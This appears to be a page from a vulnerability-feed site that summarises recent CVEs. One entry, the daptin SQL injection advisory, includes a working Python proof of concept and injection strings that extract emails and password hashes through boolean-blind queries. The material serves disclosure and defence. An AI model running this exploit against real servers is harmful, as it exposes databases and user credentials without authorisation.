Skip to main content
CVE-2026-7332 HIGH This Week

Stored cross-site scripting (XSS) in LatePoint WordPress booking plugin (versions ≤5.5.0) allows unauthenticated attackers to inject malicious scripts via the 'booking_form_page_url' parameter that execute when administrators view activity logs. The vulnerability exploits a design flaw where the latepoint_order_intent_created action hook writes unsanitized input to the database before Stripe Connect validation occurs, meaning no functional payment integration is required for exploitation. Wordfence reported this issue with source code references demonstrating the flawed input handling in activities_controller.php and activities_helper.php. CVSS 7.2 with scope change (S:C) reflects potential for attackers to pivot from stored XSS to administrative session hijacking.

XSS WordPress
NVD VulDB
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-44349 HIGH PATCH GHSA This Week

## Summary `processFuzzySearch` in `server/resource/resource_findallpaginated.go:1484` splits the user-supplied `column` parameter by comma and interpolates each segment directly into `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col))` raw SQL with no column whitelist check. The entry point is `GET /api/<entity>` with `operator=fuzzy` (or `fuzzy_any`, `fuzzy_all`). Any authenticated user - including one who self-registered with no admin involvement - can read the entire database. --- ## Details At `resource_findallpaginated.go:1761`, when the operator is `fuzzy`, `fuzzy_any`, or `fuzzy_all`, execution routes to `processFuzzySearch` (line 1763) before `processQueryFilter` (line 1780). `processQueryFilter` is the only path that calls `GetColumnByName` (line 1351), which validates column names against the table schema. The fuzzy branch never reaches that check. Inside `processFuzzySearch` (line 1484), `filterQuery.ColumnName` is split by comma. After `strings.TrimSpace` (line 1486), each segment is routed to a DB-driver-specific function. The injectable sink reached depends on the driver and the `fuzzy_options.fallback_mode` field. **SQLite** (`processFuzzySearchSQLite`, lines 1632-1676) uses `goqu.L` in all code paths - no `fallback_mode` required: - `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col), ...)` - line 1650/1657 **PostgreSQL, MySQL, MSSQL** default to `goqu.Ex` (identifier-quoted, not injectable). The `goqu.L` sink is only reached when the attacker supplies a specific `fuzzy_options.fallback_mode` value in the HTTP `query` JSON: - PostgreSQL `word_boundary` mode (line 1540): `goqu.L(fmt.Sprintf("%s ~* ?", prefix+col), ...)` - MySQL `soundex` mode (line 1598): `goqu.L(fmt.Sprintf("SOUNDEX(%s) = SOUNDEX(?)", prefix+col), ...)` - MSSQL `soundex` mode (line 1694): `goqu.L(fmt.Sprintf("DIFFERENCE(%s, ?) >= 3", prefix+col), ...)` `fuzzy_options` is deserialized from the HTTP request at line 243 (`json.Unmarshal([]byte(query[0]), &queries)`) - it is fully attacker-controlled. `goqu.L` emits its first argument as a raw SQL literal. The column position uses `%s` string formatting, not a bound parameter. `prefix` is fixed at line 351 as `dbResource.model.GetName() + "."` - for `/api/world` this is `"world."`. Against SQLite, an attacker-supplied column value of `reference_id) OR 1=1 OR LOWER(world.reference_id` expands in the WHERE clause to `LOWER(world.reference_id) OR 1=1 OR LOWER(world.reference_id) LIKE ?`. Against PostgreSQL (where `reference_id` is stored as `bytea`), the `~*` regex operator requires a text-type column; the attack targets a `varchar` column instead (e.g., `table_name`) with an adapted injection template. **Relation to GHSA-rw2c-8rfq-gwfv**: That patch modified `resource_aggregate.go` to fix `/aggregate/:typename`. This vulnerability is in `resource_findallpaginated.go` on the `/api/<entity>` fuzzy path - different file, different endpoint, different operator. The existing patch does not cover this path. **Tested:** SQLite injection dynamically confirmed (boolean-blind extraction, email extracted). PostgreSQL `word_boundary` injection dynamically confirmed (baseline=0 rows, tautology=5 rows, email=`guest@cms.go` extracted via text column). MySQL and MSSQL confirmed by code review; MySQL binary panics on initialization in the test harness (unrelated daptin bug), dynamic verification not performed. **Fix**: Add a `GetColumnByName` whitelist check in `processFuzzySearch` (line 1484) before the comma-split, matching the pattern in `processQueryFilter:1351`. All four DB driver sinks require fixing. --- ## PoC **Environment:** ```bash git clone https://github.com/daptin/daptin cd daptin git checkout 5d3214244890989eceefa694bfc976ef11458721 go build -o daptin-server . ./daptin-server # listens on :6336, SQLite backend by default ``` **poc.py** (Python 3, no dependencies): ```python import json, urllib.request, urllib.parse BASE = "http://localhost:6336" def post(path, body): req = urllib.request.Request(BASE + path, json.dumps(body).encode(), {"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- ## Impact **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQLi PostgreSQL Python Oracle Apple
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-44010 HIGH POC PATCH GHSA This Week

Unauthorized PII disclosure in Craft CMS GraphQL API allows cross-scope address enumeration via missing authorization check. A GraphQL API token scoped to any single low-privilege user group can read all addresses system-wide, including PII from restricted user groups (full names, home addresses, corporate addresses, tax IDs, GPS coordinates). The Address element resolver bypasses schema scope filtering that all other element resolvers enforce. Vendor-released patch: versions 5.9.18 and 4.17.12. Publicly available exploit code exists (detailed PoC in GitHub advisory). Affects all Craft CMS Pro deployments (v4.0.0+) using headless GraphQL APIs with user group scoping-a standard deployment pattern for Next.js/Nuxt/Gatsby frontends.

Authentication Bypass Docker PHP
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-42339 HIGH GHSA This Week

Server-Side Request Forgery in new-api allows authenticated regular users to probe internal services and exfiltrate localhost content by injecting 0.0.0.0 into multimodal API requests. The SSRF protection filter fails to block the 0.0.0.0/8 address range, which resolves to localhost on Linux. Attackers holding any valid API token can send crafted image_url, file_data, or video_url parameters to /v1/chat/completions, /v1/responses, or /v1/messages endpoints, bypassing private-IP checks entirely. When requests route through AWS/Bedrock Claude adaptors, the server fetches the content and inlines it into model responses, upgrading blind SSRF to full-read exfiltration of internal images, PDFs, and text files on default-allowed ports 80, 443, 8080, and 8443. No public exploit code identified at time of analysis; no vendor-released patch confirmed for versions through 0.11.9-alpha.1.

SSRF
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-44012 HIGH PATCH GHSA This Week

Authenticated control-panel users in Craft CMS 5.x can enumerate asset filenames and complete folder hierarchies (volume handles, UIDs, folder names, URIs) across all volumes by sending arbitrary asset IDs to the AssetsController::actionShowInFolder endpoint, bypassing volume-level viewAssets and viewPeerAssets permission checks. The flaw stems from an incomplete February 2026 patch wave that fixed four sibling endpoints but missed this method, introduced 13 days before the patch release. No public exploit identified at time of analysis; vendor-released patch fixes 5.9.18 and later. This information disclosure vulnerability enables reconnaissance for follow-up attacks against restricted asset volumes.

Authentication Bypass PHP
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-42280 HIGH PATCH GHSA This Week

Token validation flaw in Auth0.js SDK versions 8.11.0 through 9.32.0 allows authenticated attackers to retrieve user profile information by submitting a valid access token alongside a crafted invalid ID token, bypassing access control rules defined in Auth0 Actions. The vulnerability affects applications that depend on Auth0 Actions for authorization decisions, potentially exposing sensitive user profile data to attackers holding valid but insufficiently privileged access tokens. Vendor-released patch available in version 10.0.0, discovered through coordinated disclosure by security researcher Quan Le.

Authentication Bypass Auth0
NVD GitHub
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-43577 HIGH PATCH This Week

Arbitrary file read in OpenClaw before 2026.4.9 allows authenticated remote attackers to bypass navigation guards and access local files via browser interaction routes. Attackers exploit the ability to trigger navigation into the local Chrome DevTools Protocol (CDP) origin through act/evaluate commands, then create or read disallowed file:// URLs despite direct navigation policy restrictions. Patch available in version 2026.4.9 and confirmed included in npm release 2026.4.14. No public exploit code identified at time of analysis, CVSS 7.1 (High) with network attack vector and low complexity.

Authentication Bypass Openclaw
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-43281 HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: mailbox: Prevent out-of-bounds access in fw_mbox_index_xlate() Although it is guided that `#mbox-cells` must be at least 1, there are many instances of `#mbox-cells = <0>;` in the device tree. If that is the case and the corresponding mailbox controller does not provide `fw_xlate` and of_xlate` function pointers, `fw_mbox_index_xlate()` will be used by default and out-of-bounds accesses could occur due to lack of bounds check in that function.

Information Disclosure Buffer Overflow Linux
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-43241 HIGH PATCH This Week

Out-of-bounds array access in the Linux kernel's NTB Switchtec hardware driver allows authenticated local users with low privileges to read sensitive kernel memory or trigger denial of service. The vulnerability affects the mw_sizes array when NTB (Non-Transparent Bridge) configurations set memory window LUTs to MAX_MWS, enabling access beyond array boundaries. Exploitation probability is low (EPSS 0.02%, 7th percentile) with no confirmed active exploitation or public POC. Vendor patches are available across all affected stable kernel branches (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, and mainline 7.0).

Information Disclosure Buffer Overflow Linux Red Hat Suse
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-43141 HIGH PATCH This Week

Local denial-of-service and potential memory corruption in the Linux kernel's ntb_hw_switchtec driver allows a low-privileged local user to trigger undefined behavior via a shift-out-of-bounds condition when the Non-Transparent Bridge (NTB) is configured with zero Memory Window LUTs. The flaw stems from rounddown_pow_of_two being invoked on a zero value, and although no public exploit is identified at time of analysis, the upstream fix is available across multiple stable kernel branches. EPSS is very low at 0.02%, consistent with the local attack vector and narrow hardware-dependent trigger.

Information Disclosure Buffer Overflow Linux
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41286 HIGH PATCH This Week

Stack-based buffer overflow in WatchGuard Agent discovery service on Windows enables adjacent attackers without authentication to crash the agent via crafted network packets. CVSS 7.1 (High) reflects adjacent network attack vector with high integrity impact. The vulnerability targets the discovery service component used for agent enrollment and network communication. No CISA KEV listing or public exploit code identified at time of analysis, though the local network attack vector limits exposure to adjacent attackers.

Watchguard Stack Overflow Microsoft Buffer Overflow
NVD
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-41287 HIGH PATCH This Week

Stack-based buffer overflow in WatchGuard Agent's discovery service allows adjacent network attackers to crash the agent service without authentication. Affects Windows installations prior to version 1.25.03.0000. Vendor patch released addressing the vulnerability. SSVC framework indicates no active exploitation observed and manual exploitation required. While CVSS 7.1 (High) reflects network-adjacent access with high availability impact, actual risk is limited to denial-of-service - no code execution or data compromise possible per the CVSS vector (VC:N/VI:N/VA:H).

Watchguard Stack Overflow Microsoft Buffer Overflow
NVD
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-43280 HIGH PATCH This Week

Local authenticated attackers can trigger an out-of-bounds kernel memory read in Linux kernel's xe graphics driver (6.18-6.19.x) via malicious pat_index values in the madvise IOCTL. This allows information disclosure from kernel memory and potential denial of service through kernel crashes. The vulnerability exists because madvise_args_are_sane() fails to validate pat_index bounds before passing it to xe_pat_index_get_coh_mode(), which performs unsafe array access into xe->pat.table. Vendor patches available for kernels 6.18.16+ and 6.19.6+ implement bounds checking with array_index_nospec() to prevent both direct exploitation and Spectre-based side-channel attacks. EPSS score of 0.02% indicates low observed exploitation probability, and no public exploit or CISA KEV listing exists at time of analysis.

Buffer Overflow Linux Information Disclosure Red Hat Suse
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-43166 HIGH PATCH This Week

Out-of-bounds read in Linux kernel EROFS filesystem allows local attackers with user interaction to read kernel memory and cause denial of service via crafted compressed images. The vulnerability stems from incorrect classification of unaligned plain extents, triggering OOB access in z_erofs_transform_plain(). Vendor patches are available across multiple stable kernel branches (6.15, 6.18.16, 6.19.6, 7.0). EPSS score of 0.02% (4th percentile) indicates very low observed exploitation probability, with no active exploitation confirmed at time of analysis.

Linux Memory Corruption Buffer Overflow
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-40326 HIGH PATCH This Week

Cross-Site Request Forgery in Masa CMS allows unauthenticated attackers to force logged-in administrators to create site bundles containing sensitive data including password hashes, user accounts, and configuration details. The bundles are saved to predictable public directories where any unauthenticated attacker can download them. This vulnerability affects versions 7.5.2 and earlier across multiple release branches. Fixed versions are available: 7.2.10, 7.3.15, 7.4.10, and 7.5.3. CVSS 7.1 HIGH with network attack vector requiring user interaction but no authentication.

CSRF
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-40174 HIGH PATCH This Week

Cross-site request forgery (CSRF) in Masa CMS 7.5.2 and earlier allows remote attackers to manipulate user address records through forged requests when authenticated administrators interact with malicious content. The cUsers.updateAddress function lacks proper anti-CSRF token validation, enabling unauthorized addition, modification, or deletion of email addresses, phone numbers, and other contact data. Patches available in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. EPSS data not provided; no CISA KEV listing indicates targeted rather than widespread exploitation; no public exploit identified at time of analysis.

CSRF
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-33441 HIGH PATCH This Week

Malformed reference links in Mistune 3.2.0 trigger algorithmic complexity attacks in the parse_link_title() function, causing 100% CPU consumption and permanent process hangs. The vulnerability affects Python applications processing untrusted Markdown content, enabling remote denial-of-service through minimal-size payloads (the provided POC is under 200 bytes). A publicly available proof-of-concept demonstrates consistent exploitation discovered via coverage-guided fuzzing. Vendor patch 3.2.1 addresses the issue by implementing parsing limits and defensive checks.

Suse Denial Of Service Python
NVD GitHub
Prev Page 5 of 5

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy